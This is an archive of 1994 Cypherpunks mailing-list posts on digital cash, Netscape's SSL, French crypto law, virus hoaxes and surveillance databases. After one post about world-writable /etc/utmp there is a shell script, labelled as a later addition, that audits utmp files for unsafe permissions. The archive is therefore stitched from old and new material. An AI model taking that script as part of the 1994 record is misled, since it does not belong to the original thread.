Date: Fri, 9 Dec 94 09:01:02 PST
Subject: cut & choose
In-Reply-To: <199412082010.OAA00148@omaha.omaha.com>
Message-ID: <199412091700.JAA03881@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

Alex Strasheim writes:

>I don't understand why anyone would use the cut and choose protocol over
>denominated keys. Chaum's method seems a lot cleaner to me and more
>secure. It obviously uses less bandwidth. What am I missing here?

Schneier's examples are meant to be instructional in nature rather than practical, showing how it would be done with paper envelopes and such. The only example he has which is cryptographic is the "off-line" version where Alice's identity is encoded in the cash in such a way that it is revealed if she double-spends. Chaum's off-line protocol also relies on cut and choose for this (Chaum, Fiat, Naor, Crypto 88). That is the major improvement in Brands' scheme, that you don't have to use cut and choose for his off-line cash system.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Fri Dec 9 10:12:55 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 9 Dec 94 10:12:55 PST
Subject: BofA+Netscape
In-Reply-To:
Message-ID: <199412091814.NAA07757@hermes.bwh.harvard.edu>

| Lads,
|
| I thought many of you would be interested in the text of this story.
| I'm wondering if anyone has any comments on the encryption mechanism (i.e.
| "eavesdropping" protection) being used.

It is my personal feeling that Netscape doesn't have the right talent mix to develop secure software. For example, they may well get the RSA parts right, and then store the passphrase in a text file, 'for ease of use.' The RSA is secure, but the system is not secure if unauthorized people using your machine is a possibility.

Writing secure software is a difficult and tricky business that requires a lot of effort; early versions of Mosaic had problems.

Netscape really needs to develop a threat model that allows them to assess the severity of potential problems. It is my guess that they have not done so, although, I'd be pleased to hear I'm wrong.

Everyone's favorite company, First Virtual, seems to have developed a threat model that allows them to offload almost all risk and security problems to their customers. It may not be a good solution, but at least they have considered how the security of their system intersects the real world. Just integrating RSA does not do that.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
						       -Hume

From pierre at shell.portal.com Fri Dec 9 10:49:25 1994
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Fri, 9 Dec 94 10:49:25 PST
Subject: crypto email to France
In-Reply-To: <9412072357.AA00829@chuckwala>
Message-ID: <199412091848.KAA20985@jobe.shell.portal.com>

Rebecca Farr said:

> My company would like to be able to send encrypted mail to our office
> in Paris.[...]
> I've been told by someone
> here in the US that France wants control of any use of encryption software
> including sending email.

I don't recommend relying on info found on the net without tracking it back to its sources.
In this case, the official publication of the French laws, fairly accessible anyway (in France :-)

In any case, you could take a look at:

http://www.ens.fr/equipes_dmi/grecc/loi.html

where is stored what is claimed to be a transcript of the relevant French law (missing is the regulatory procedure which is as important to you). At least missing last time I looked. You can also look around at that group's home page:

http://snekkar.ens.fr:80/equipes_dmi/grecc/

I posted to this group a tentative translation in September, here it is again:

As to the quality of the translation: I'm not an american lawyer, nor a french lawyer, and any given legal paragraph can usually be interpreted either way. This may not even be my reading tomorrow... To avoid confusing things even further, I'll limit my comments to remarks concerning the translation, in square brackets []. And don't blame me for the quality of the English, the French itself is laughable.

Have fun,
Pierre.
pierre at shell.portal.com

++++++ translation of the ENS post, as of Sept 23, 1994 ++++++++

Law number 90-1170, published in the "Journal Officiel" of December 30, 1990.

(The first 27 articles concern the encryption of information transmitted via radio or mail.)

Article 28. - By cryptologic services, one means all services aimed at transforming through secret conventions information or clear signals into information or signals unintelligible by third parties, or at achieving the reverse operation, via means, hardware or software, designed to that end.

To preserve the interests of defense and internal or external national security, the supply, export, or use of cryptologic means or services are subject:

a) to prior declaration when this means or service can have no other use than authenticating a communication or than ensuring the integrity of the transmitted message.

b) to prior authorization by the Prime Minister in all other cases.

A decree of the "Conseil d'Etat" [President and some ministers, if I recall] determines the circumstances in which the declaration is filed, or the authorization granted, as per the previous paragraph. This decree can make provisions for a simplified system of declaration or authorization for certain types of equipment or services, or for certain categories of users.

II. - In addition to the provisions of the customs code, anyone having exported a cryptologic means, or having provided or made to be provided a cryptologic service without the authorization mentioned in paragraph I of the present article, will be punished by a fine of 6000 F [US$1,200] to 500 000 F [US$100,000] and by imprisonment of one to three months or by one of these two sentences only. The court can, in addition, forbid the person from requesting this authorization for a period of at most two years, or five years for subsequent offenses.

In case of conviction, the court can, in addition, pronounce the forfeiture of the cryptologic equipment.

III. - In addition to police officers and customs officers in their jurisdiction, agents authorized for this purpose by the Prime Minister and sworn in the conditions specified by the "Conseil d'Etat", can investigate and report by a [sworn, whatever] statement any violations of the present article and of the corresponding regulations. Their statements are forwarded within five days to the "Procureur de la Republique" [district attorney ?].

They can enter business locations and transportation means, request the disclosure of any business documents and take copies of them. They can, on location or by convocation, collect information and justifications.

=====================================

Decree Number 92-1358 of December 28, 1992, published in the "Journal Officiel" of December 30, 1992.

Decision of December 28, 1992 about declarations and requests for authorization relative to cryptologic equipment and services.

...

Art. 4 - Require prior declaration, the provision, export, and use of any cryptologic equipment and services ... in particular :

- The equipment, hardware or software, susceptible to ensure the confidentiality of communications of any nature, or the confidentiality of data stored in memory;

- Cryptologic services that ensure the confidentiality of all or part of a communication, or of data stored in memory;

- Cryptoanalytic equipment and services.

[This "declaration" article may in fact be an "authorization" article. That would be a pretty major mistake of the previous transcriber.]

Art. 6 - Smart cards that do not allow, in and of themselves, that is without the need for external cryptologic devices, to ensure the confidentiality of communications, benefit of the same declarations filed and authorizations obtained for the equipment and services with which they are used.

Art. 7 - Are not considered cryptologic equipment, the means, hardware or software, specifically designed for the protection of software against illegal copying or use, even if they use methods or devices kept secret, on the condition that they do not allow the encryption, either directly or indirectly of that software package.

...

Art. 9 - In case of uncertainty of the requestor, as to whether some equipment or service belongs to the category of cryptologic equipment and services, the central service for the security of information systems is consulted.

Paris, December 28, 1992.

French version according to Jerome RABENOU
Student at the Villetaneuse Law School.
Paris - France.

From tcmay at netcom.com Fri Dec 9 10:49:48 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 9 Dec 94 10:49:48 PST
Subject: BofA+Netscape
In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu>
Message-ID: <199412091849.KAA01760@netcom15.netcom.com>

Adam Shostack wrote:

> It is my personal feeling that Netscape doesn't have the right
> talent mix to develop secure software.
For example, they may well get
> the RSA parts right, and then store the passphrase in a text file,
> 'for ease of use.' The RSA is secure, but the system is not secure if
> unauthorized people using your machine is a possibility.
>
> Writing secure software is a difficult and tricky business
> that requires a lot of effort; early versions of Mosaic had problems.

Netscape is seeking people to write this stuff, as we heard at the last Cypherpunks meeting. So, this is the chance for Cypherpunks to see it done right.

I will speculate that Netscape, being a _very_ high-visibility company, is in contact with the folks at RSA Data Security about this, perhaps even using them to do the integration. (Recall that Bidzos is involved in a couple of efforts along these lines.) This doesn't mean they'll do it right, natch, but it gives us hope that the crypto protocols will at least be well-handled.

(Ultra-speculative scenario: If I were the NSA/FBI/COMINT establishment, anxious to ensure "escrowed access," Netscape is something I'd be looking at. Ultra-speculatively, we should be on the lookout for any evidence that Netscape will be deploying any kind of "software key escrow" scheme, e.g., any links to the TIS proposals, to Denning, etc. "GAKscape"?)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tcmay

From pierre at shell.portal.com Fri Dec 9 11:11:39 1994
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Fri, 9 Dec 94 11:11:39 PST
Subject: crypto email to France
In-Reply-To: <9412072357.AA00829@chuckwala>
Message-ID: <199412091911.LAA25108@jobe.shell.portal.com>

Rebecca Farr said:
> Does anyone here know any details or where I might find out more about
> what, if anything, needs to be done to legally exchange encrypted email
> with our office in Paris?

It would be great if you could post a summary of the practical procedure, once you find out. It's nice to have (an approximation of) the legal text, but that's usually quite removed from the actual paperwork.

Thanks,
Pierre.
pierre at shell.portal.com

From JLICQUIA at mhc.uiuc.edu Fri Dec 9 11:34:17 1994
From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI))
Date: Fri, 9 Dec 94 11:34:17 PST
Subject: BofA+Netscape
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> It is my personal feeling that Netscape doesn't have the right
>talent mix to develop secure software. For example, they may well get
>the RSA parts right, and then store the passphrase in a text file,
>'for ease of use.' The RSA is secure, but the system is not secure if
>unauthorized people using your machine is a possibility.
>
> Writing secure software is a difficult and tricky business
>that requires a lot of effort; early versions of Mosaic had problems.
>
> Netscape really needs to develop a threat model that allows
>them to assess the severity of potential problems. It is my guess
>that they have not done so, although, I'd be pleased to hear I'm
>wrong.
>
> Everyone's favorite company, First Virtual, seems to have
>developed a threat model that allows them to offload almost all risk
>and security problems to their customers. It may not be a good
>solution, but at least they have considered how the security of their
>system intersects the real world. Just integrating RSA does not do
>that.
This intrigued me, so I checked it out. I didn't see anything about a threat model, but they did have some extensive discussion about their security, including things I found interesting... They call their system "Secure Sockets Layer" (SSL), which appears to be a kind of link-level encryption which they layer below HTTP. This is opposed to SHTTP, which is more MIME-like. They don't seem to think much of SHTTP; their FAQ answers the question "Are there other secure browsers available?" with "Nope; no one else uses SSL at this time." (paraphrased) What's interesting is that they're planning to put NNTP, FTP, etc. on top of SSL as well, allowing for "secure FTP" and "secure news", etc. SSL is supposedly an open standard, and Netscape is pressing for it to become a true standard. Apparently, they've even issued an RFC for it. The full text of the SSL protocol is on their Web site. As for technical issues, they aren't very satisfactory concerning the kind of questions Adam raised; it's mostly about RC4 layered on top of RSA and MD5 hashes sent at this time, etc... The SSL spec contains a section on attacks which seems elementary even to my novice mind. Is there interest in posting the spec? It's in RFC format, but hasn't even been assigned a number yet, so it doesn't appear to be uncopyable, as it were. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuiwnjER5KvPRd0NAQGBNAP+PpTRHhzVq+ogPkCUP4vBSYG9ooOnSVOi tOaG+4zQYJa7iPBP11/aODYM9JjlNr8zGBDfKr1SzOI7ntg59C8/aGscc5XvJh5I wE2TxHOqA+OE+AtSy4jDE09yVG/TUZuO69Ig5+v/xJy+XU1nspUoJ02mi5EQo/59 Qq1nDoeKpoE= =vBg6 -----END PGP SIGNATURE----- From rsalz at osf.org Fri Dec 9 12:04:24 1994 From: rsalz at osf.org (Rich Salz) Date: Fri, 9 Dec 94 12:04:24 PST Subject: How to Destroy the Internet (was Info about Linux) Message-ID: <9412092000.AA08347@sulphur.osf.org> Is /etc/utmp still world-writeable on most machines these days? Hell, even CERT put out an advisory about this years ago. 
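
Added example, not part of Rich Salz's message or of any CERT advisory: a POSIX shell check for the condition he asks about, a login-accounting file that any local user can write to or replace. The function names and every path other than /etc/utmp are assumptions.

```shell
#!/bin/sh
# Added example: audit login-accounting files for world-writable permissions.
# Only /etc/utmp is named in the message above; the other paths are assumed
# locations used by later Unix and Linux systems.
UTMP_CANDIDATES="/etc/utmp /var/run/utmp /run/utmp /var/adm/utmp /var/log/wtmp /var/adm/wtmp"

# is_world_writable PATH
# Succeeds when PATH exists and its mode has the "other write" bit (0002).
# -L follows a symlink so the target's mode is tested, not the link's;
# -prune keeps find from descending when PATH is a directory.
is_world_writable() {
    [ -e "$1" ] || return 1
    [ -n "$(find -L "$1" -prune -perm -0002 2>/dev/null)" ]
}

# is_replaceable_dir DIR
# Succeeds when DIR is world-writable without the sticky bit (01000). In such
# a directory any local user can rename or unlink a file they do not own and
# put their own file in its place, so a correct file mode alone is not enough.
is_replaceable_dir() {
    [ -d "$1" ] || return 1
    [ -n "$(find -L "$1" -prune -perm -0002 ! -perm -1000 2>/dev/null)" ]
}

# audit_paths PATH...
# Prints one line per finding and returns non-zero if there was any finding.
# Paths that do not exist on this system are skipped silently.
audit_paths() {
    findings=0
    for p in "$@"; do
        [ -e "$p" ] || continue
        if is_world_writable "$p"; then
            echo "WORLD-WRITABLE: $p"
            findings=$((findings + 1))
        fi
        d=$(dirname "$p")
        if is_replaceable_dir "$d"; then
            echo "PARENT-DIR-WRITABLE: $d (allows replacing $p)"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Run the audit over the default candidates when invoked as: sh script audit
if [ "${1:-}" = "audit" ]; then
    # Word splitting of the candidate list is intentional here.
    audit_paths $UTMP_CANDIDATES
fi
```

A finding is fixed by removing the other-write bit (chmod o-w) and leaving writes to the privileged login programs that maintain the file.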
From farr at evtech.com Fri Dec 9 12:22:37 1994
From: farr at evtech.com (Rebecca Farr x260)
Date: Fri, 9 Dec 94 12:22:37 PST
Subject: crypto email to France
Message-ID: <9412092024.AA01150@chuckwala>

>
> Rebecca Farr said:
> > Does anyone here know any details or where I might find out more about
> > what, if anything, needs to be done to legally exchange encrypted email
> > with our office in Paris?
>
> It would be great if you could post a summary of the practical
> procedure, once you find out. It's nice to have (an approximation of)
> the legal text, but that's usually quite removed from the actual
> paperwork.
>
> Thanks,
> Pierre.
> pierre at shell.portal.com
>

Thank you, Pierre, and everyone else who has responded both privately and through the cypherpunks mailing list. I will post a summary of the procedure and any other relevant information when I (finally!) find out what that is.

Thanks also for the translation of the French law you posted. Someone from France had sent me the original, and while I can read it, this will save me some work writing up a translation for our lawyer.

Best wishes to all,
Rebecca Farr
farr at evtech.com

From samman at CS.YALE.EDU Fri Dec 9 13:02:07 1994
From: samman at CS.YALE.EDU (Ben)
Date: Fri, 9 Dec 94 13:02:07 PST
Subject: Secure DAC?
In-Reply-To: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu>
Message-ID:

> I fail to see how this would increase cryptographic potential. However,
> it would seem to mask the device's EMR. The application notes state that
> it is useful in CRT display drivers, audio encoders, &c. These are all
> devices that are susceptible to TEMPEST monitoring (or whatever the
> correct name is). If one output goes to the desired next stage (the

The spooky term for it is MASINT-Measurement and Signals INT.

Ben.
From ddt at lsd.com Fri Dec 9 13:34:08 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 9 Dec 94 13:34:08 PST Subject: Netscape SSL protocol URL Message-ID: Check out: http://home.mcom.com/info/SSL.html First few lines reproduced below. Sorry no sign on this one, must jet now! dave =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The SSL Protocol The SSL protocol has been submitted to the W3O working group on security for consideration as part of a general security approach for the Web, and we are actively working within the W3O and with many of its member entities on establishing open security standards for the net. This protocol specification was last revised on November 29th, 1994. Recent changes include: a fundamental correction to the client-certificate authentication protocol, the removal of the username/password messages, corrections in some of the cryptographic terminology, the addition of a MAC to the messages [see section 1.2], the allowance for different kinds of message digest algorithms. Internet Data Security Document Experimental Kipp E.B. Hickman Request For Comments: XXXX Netscape Communications Corp. Last Update: Nov. 29th, 1994 ______________________________________________________________________________ The SSL Protocol Status of this Memo This RFC specifies a security protocol for the Internet community, and requests discussion and suggestions for improvements. Distribution of this memo is unlimited. Abstract This document specifies the Secure Sockets Layer (SSL) protocol, a security protocol that provides privacy over the Internet. The protocol allows client/server applications to communicate in a way that cannot be eavesdropped. Server's are always authenticated and clients are optionally authenticated. 
[elided]

From rarachel at prism.poly.edu Fri Dec 9 13:49:28 1994
From: rarachel at prism.poly.edu (Arsen Ray Arachelian)
Date: Fri, 9 Dec 94 13:49:28 PST
Subject: "Virus Alert" chain letter
In-Reply-To: <199412070700.CAA10366@ducie.cs.umass.edu>
Message-ID: <9412092134.AA23663@prism.poly.edu>

I was just on AOL a few days ago. Steve Case, CEO of AOL stated that this was indeed just a rumor, and a cheap assed one at that, so we can dump this discussion. :-) There ain't no such good times virus.

From pstemari at fsp.fsp.com Fri Dec 9 14:47:34 1994
From: pstemari at fsp.fsp.com (Paul Ste. Marie)
Date: Fri, 9 Dec 94 14:47:34 PST
Subject: (Fwd) Read this, Virus info!!
In-Reply-To: <9412071644.AA00278@ch1d157nwk>
Message-ID: <9412092247.AA00025@fsp.fsp.com>

As OLE becomes more popular, this will be a bigger problem. It's quite possible to stick a nasty macro in an MS Word document that will get executed when the Word document is opened for viewing.

Paul

From turner at telecheck.com Fri Dec 9 15:07:54 1994
From: turner at telecheck.com (Joe Turner)
Date: Fri, 9 Dec 94 15:07:54 PST
Subject: Breaking the NSA
In-Reply-To:
Message-ID: <9412090637.AA07681@TeleCheck.com>

>
> On Thu, 8 Dec 1994, Ian Farquhar wrote:
>
> > I am told that a similar trick was tried by some people back in the
> > early 1980's, when they were trying to figure out if the NSA could
> > indeed break DES. There was no official response to these attempts.
>
> Or then again, maybe the people involved suddenly had the last 10 years
> or so of their tax returns scrutinised; maybe they were denied social
> benefits; etc.
>

Or then again maybe they were chopped up in little pieces and are buried in a hefty-sinch sack somewhere in the Nevada desert. Or maybe they were forced to watch an endless stream of bad T.V. sitcoms like T.J. Hooker until their brains melted and ran down the sides of their faces. Or maybe they just committed suicide because they just couldn't deal with all of the guilt... <>

-- Joe N.
Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 compu$erv: 73301,1654 (800) 888-4922 * (713) 439-6597 From hfinney at shell.portal.com Fri Dec 9 15:43:52 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 9 Dec 94 15:43:52 PST Subject: BofA+Netscape In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu> Message-ID: <199412092343.PAA10962@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Here is a posting I made to www-security a few days ago when Netscape announced SSL. It did not get any response. I see though that they at least fixed their spelling... Date: Sun, 27 Nov 1994 12:12:47 -0800 From: Hal X-To: www-security at ns1.rutgers.edu Subject: Re: info on proposed SSL protocol and Netscape implementation Sender: owner-www-security at ns1.Rutgers.EDU I have a few comments on the proposed SSL and Netscape's HTTP-SSL that uses it. First, CHALLENGE is consistently mis-spelled CHALLANGE throughout the SSL document. Second, 3 cyphers are specified in this version of the document: RC4, RC2, and DES. I would like to see 3DES and/or IDEA. RC4 and RC2 have not to my knowledge received much public scrutiny, and the 56 bit key size of DES is of questionable security today. Of course these would be for the non-export versions. Third, it is not clear how practical the use of X.509 certificates will be. For example, the "name" field in the certificate must somehow be checked against the information which the client has about the server. Typically this will just be a machine address like home.mcom.com or something similar. Is X.509 a good fit for this purpose? I am not too familiar with X.509 but generally the names that I have seen are not in this form. Fourth, it would be nice if there were some support for non-certificate authentication of the server's public key. For example, the client may have obtained that key previously. I believe SHTTP is more flexible in this area. 
Fifth, I don't really like the idea that the Netscape client embeds "approved" certificate authority keys. I suspect that the CA situation is going to be in flux for quite a long time and one's client could easily get out of date. Note that the reliance on CA's seems to have slowed the acceptance of PEM as a widely used standard. PGP's anarchic "web of trust" has perhaps been a better fit to net culture. Sixth, the use of "https:" as a URL type for secure links provides for a very strict separation of secure and non-secure connections. Furthermore, this separation is chosen by the server operator. I would like to see a more flexible system, one where the client has more control over what information is transferred securely. The server may want to set a minimum, and refuse to exchange certain information non-securely, but it should not IMO also set the maximum. Some clients may be more privacy conscious than others. Some may not want information about which URL's they use to be available to local snoopers. The Netscape approach seems to put too much control into the hands of the servers and not enough into the hands of the clients. SHTTP also uses a special URL, but it seemed to be more open to the possibility of a negotiation between client and server for secure connections even on "http:" URLs. This would be done by having backwards compatibility with HTTP in which a non-secure-aware client or server would ignore or reject the security enhancements. The transaction could then proceed in non-secure mode with appropriate information displays to the user. SSL does not appear to allow for this kind of compatibility. Despite the negative tone here I think that SSL is potentially a good step towards enhanced privacy on the net. I think though that eventually encryption will be used far more widely than Netscape seems to have in mind. The net is so insecure that I suspect people will want privacy for all but the most casual uses. 
Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLujrKhnMLJtOy9MBAQFYdwH/VAObt9l6IKb44Z9mbCiz6DiRPjjA/mQp ZZq0ns/6xKQZvw3L77mTRECRuU8Gf1j3jUXZnqPxo7t8v+IyUuplCQ== =Z+0f -----END PGP SIGNATURE----- From Agorist003 at aol.com Fri Dec 9 17:01:15 1994 From: Agorist003 at aol.com (Agorist003 at aol.com) Date: Fri, 9 Dec 94 17:01:15 PST Subject: Saturday weekly L.A. gatherings Message-ID: <941209200115_1981339@aol.com> TAKE 2!: It's always something. Saturday, December 10, 1994, and weekly henceforth (on a trial basis, excluding vacations and holidays unless someone else wants to host it): There will be a meeting under the announced name "L.A. Cypherpunks" at the California Coffee House, 4455 Overland Avenue, Culver City, CA 90230 (310) 559-8868 to discuss privacy issues and tactics. If any of y'all want to show up and flame on about your pet projects and sell stuff, it is a free, informal gathering -- show up any time between noon and 5 P.M. The first logical order of business after introductions, is "is this the time and the place?" The California Coffee House is close to my home, and it is a compromise between the extremes of a restaurant and a meeting hall without food. They serve sandwiches and coffee. They are open 9 a.m. - 5 p.m. on Saturday. The meeting will start if anyone shows up besides myself and continue until closing time. And you'll even get a little brochure! Gosh, golly, gee whiz!! BCNU! Kent - jkh at story.com (consarn it all, skippy) From sghahn at math1.kaist.ac.kr Fri Dec 9 20:30:20 1994 From: sghahn at math1.kaist.ac.kr (han@joe.math.uga.edu) Date: Fri, 9 Dec 94 20:30:20 PST Subject: Looking for Hackers' Story Message-ID: <9412100426.AA03427@math1.kaist.ac.kr> I am looking for the sources about the general aspects of the hackers. I am writing an article for a Korean journal . I am writing about the origins, the history, the developments, the new trends, and its impact on the industry, etc. 
Please send me an e-mail if you know any good sources. Thanks in advance.

From kallback at halcyon.halcyon.com Fri Dec 9 12:46:34 1994
From: kallback at halcyon.halcyon.com (Jack Starworth)
Date: 9 Dec 1994 20:46:34 GMT
Subject: SAVE 50-90% ON INT'L LONG DIST-EVEN ON THE ROAD
Message-ID: <3cafna$ka6@news.halcyon.com>

THE BEST WAY TO SAVE ON INTERNATIONAL LONG DISTANCE IS TO USE KALLBACK DIRECT

KALLBACK is the original "call-back" service provider. Kallback was specifically designed to save international businesses and frequent travelers 40%-90% on their international long distance.

How it works is very simple. When you subscribe to Kallback, you receive a personal "trigger number." When you want to make an international call, dial your trigger number and hang up after the first ring. The Kallback computer will then call you back with a US dial tone, so instead of paying the local telephone company's rates, you are billed at Kallback's, which are among THE LOWEST IN THE WORLD.

Because no outgoing call is ever completed, our customers who call from hotels DON'T HAVE TO PAY HOTEL TELEPHONE SURCHARGES.

It doesn't matter where you need to make a call from, because your location number can be changed at any time. You can have the Kallback computer ask for you by name, by room number or both. You can even program in touch tones, so Kallback will work with your automatic phone answering system. Kallback also supports modems and fax machines.

To give an idea of the savings you will see with Kallback, compare the rates you are paying now to the following:

TO THE UNITED STATES FROM (per min in $US):

Australia     $ .52
Canada          .23
France          .49
India          1.06
Japan           .78
Philippines     .99
UK              .36

Please feel free to call our 24 Hour Customer Service Department for more information. We can mail via post, fax or email information. (Requests for information via fax usually have the quickest turnaround.) Please include in your information requests the countries you call from and to.
24 HOUR CUSTOMER SERVICE DEPARTMENT: 206 281 0410 FAX: 206 281 0411 EMAIL: kallback at halcyon.com Thank You, Jack Starworth, Jr. Network Marketing Director "I don't really feel a mystic urge to fail you." --Prof. Avi Segal From cactus at hks.net Sat Dec 10 02:48:16 1994 From: cactus at hks.net (L. Todd Masco) Date: Sat, 10 Dec 94 02:48:16 PST Subject: Argh, apologies Message-ID: <199412101053.FAA27099@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- My most sincere apologies: due to a Truly Heinous filesystem lossage mode, (thanks, DEC, for ultrix 4.2!) the sign/forward service cypherpunks at hks.net has been broken since late Wednesday and everything through it has been lost. I just got back from DC/MD/VA and corrected the problem. I've modified things so that this will not happen again (at worst, signing and forwarding will be delayed until the queue is manually run). Again, I very much apologize for this. - -- Todd Masco | It's sometimes difficult to be too loud about your cactus at hks.net | enumerated rights when you're busy exercising your cactus at bb.com | unenumerated rights. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLumIeyoZzwIn1bdtAQFU6AGAu3BVYAsmo+8+mVRRhm5i4rPijBDOjUC0 b00JXC27ejVCzr2ZGis1f1pbwH+/9bDJ =xfn3 -----END PGP SIGNATURE----- From alano at teleport.com Sat Dec 10 10:03:33 1994 From: alano at teleport.com (Alan Olsen) Date: Sat, 10 Dec 94 10:03:33 PST Subject: BofA+Netscape Message-ID: <199412101803.KAA06370@desiree.teleport.com> >Lads, > >I thought many of you would be interested in the text of this story. I'm >wondering if anyone has any comments on the excryption mechanism (i.e. >"eavesdropping" protection) being used. I believe, from my visits to the >Netscape (formerly Mosaic) Communications Inc. 
offices that they are using
>RSA, but I'm not sure how *secure* their implementation is (eg. key size,
>etc.). I'll be contacting my local branch to inquire as to how soon I'll be
>able to use the service and will post my experiences with it as soon as
>possible.

If you check their WWW page, you will find information on the Secure Sockets Layer. It explains the algorithm used (RC4) and key size (40 bits). The specification is available from a web page off of their site.

With the latest version of Netscape, you can enable a "secure" connection with their site. To do so use: https://home.mcom.com/ as the home page address. (You need at least .96 to do this.)

I am not certain as to their key exchange protocol...

| "Encryption ROT13s your mind."                  | alano at teleport.com |
|"Would you rather be tortured by the government  | Disclaimer:          |
|forces or the people's liberation army?" -mklprc | Ignore the man       |
| -- PGP 2.6.2 key available on request --        | behind the keyboard. |

From kafka at desert.xs4all.nl Sat Dec 10 10:12:53 1994
From: kafka at desert.xs4all.nl (Patrick '3l33t' Oonk)
Date: Sat, 10 Dec 94 10:12:53 PST
Subject: My apologies to the list (Re: ANSI Bombs are still a threat?)
In-Reply-To:
Message-ID: <199412101814.AA28641@xs1.xs4all.nl>

-----BEGIN PGP SIGNED MESSAGE-----

meconlen at IntNet.net (Michael Conlen) once said:

ME>
ME>
ME> On Wed, 7 Dec 1994, Roy M. Silvernail wrote:
ME>
ME> > That person asks that I post instructions for recovering from so heinous
ME> > an attack. All I can suggest is escaping to a shell and doing a 'clear'
ME> > (or, under MS-DOS, 'cls').
ME>
ME> I have found that some attacks that leave your screen doing strange
ME> things can be recovered from by using the talk command. This program, on
ME> UNIX machines seems to reset a lot of things that might have gone awry
ME> with your screen.
'stty sane' also helps

!*(#%&@#!*&*&(!#!@# NO CARRIER
_______________________________________________________________________________
kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkkno, SL-1200
Kafka's home page
_______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBUAwUBLuhVV5RymF15lPcFAQEsiAH49DtxHeWC2GRa8sKGusHH+qQ0y8GuJHyA
IP5zK7Zbj5jwVEcom881CkQWWygTuJiPl3P7sNhyAcDXTQoBjpUH
=hhF7
-----END PGP SIGNATURE-----

From samman at CS.YALE.EDU Sat Dec 10 10:20:59 1994
From: samman at CS.YALE.EDU (Ben)
Date: Sat, 10 Dec 94 10:20:59 PST
Subject: Callback phones
Message-ID:

I picked this up on the alt.2600 newsgroup. Seems like it could be used for things like privacy enhancement if it was coupled with a credit card/cashier's check that wasn't in your name along with perhaps a call back loop.

Ben.

Begin Forwarded Article:
__________

From bdolan at well.sf.ca.us Sat Dec 10 13:43:34 1994
From: bdolan at well.sf.ca.us (Brad Dolan)
Date: Sat, 10 Dec 94 13:43:34 PST
Subject: Big Brother database
Message-ID: <199412102143.NAA28205@well.sf.ca.us>

-----BEGIN PGP SIGNED MESSAGE-----

I'm watching a congressional hearing on C-SPAN about the "Computer Criminal Tracking System." Jim Martin of the National Consortium for Justice Information and Statistics is testifying, describing an FBI database under development.

As an example of its intended use, he gave the following example: A hitchhiker could be stopped by police and required to submit fingerprints. These fingerprints could be transmitted digitally to obtain instant identification and "criminal history" information about the hitchhiker. Criminal history information would include information from federal, state, and local authorities.

Mr.
Martin also observed that, while existing Justice Information databases are now used only for law-enforcement, firearms licensing, and "national security purposes," he envisions that the new database could be expanded in its uses to include "non-criminal justice" applications.

Why should I have to provide fingerprint identification on demand to cops?

What are the "national security" applications of existing databases?

Imagine all the potential "non-criminal justice" applications for the new database.

What happens when this database gets linked up to the "citizen tracking and employment eligibility" database under construction?

Do we then have a de facto (cardless) national ID? I think so.

-----BEGIN PGP SIGNATURE-----
Version: 2.9.i

iAMtyPingInAfakeKeYBecaUSeSomePeoPleOnACErtaINMailiNGLIStarereQU
IRinGtheUseoFDiGiTaLSiGNAturES.DoESTHIsMaKEaNYSenSEtoyOU?ItDoESN
'TTOMEsOIAMdoINgTHisInsTEAdblAHBLahbLAHbLahBlAHBlahBlahbLAHBlahb
blAHBlahbLAh
blAHb
-----END PGP SIGNATURE-----

From merriman at metronet.com Sat Dec 10 14:45:46 1994
From: merriman at metronet.com (David K. Merriman)
Date: Sat, 10 Dec 94 14:45:46 PST
Subject: Big Brother database
Message-ID: <199412102245.AA12412@metronet.com>

-----BEGIN PGP SIGNED MESSAGE-----

The above line is a recycled pgp signature header. Save those bits!

>
>Mr. Martin also observed that, while existing Justice Information
>databases are now used only for law-enforcement, firearms licensing,
>and "national security purposes," he envisions that the new
>database could be expanded in its uses to include "non-criminal justice"
>applications.

Oh, hot diggety.

>Why should I have to provide fingerprint identification on demand to
>cops?

'cause they'll shoot you or toss you in jail if you don't?

>
>What are the "national security" applications of existing databases?

Finding out which spies in the CIA have been deducting payments on their new Jaguars.

>
>Imagine all the potential "non-criminal justice" applications for the
>new database.
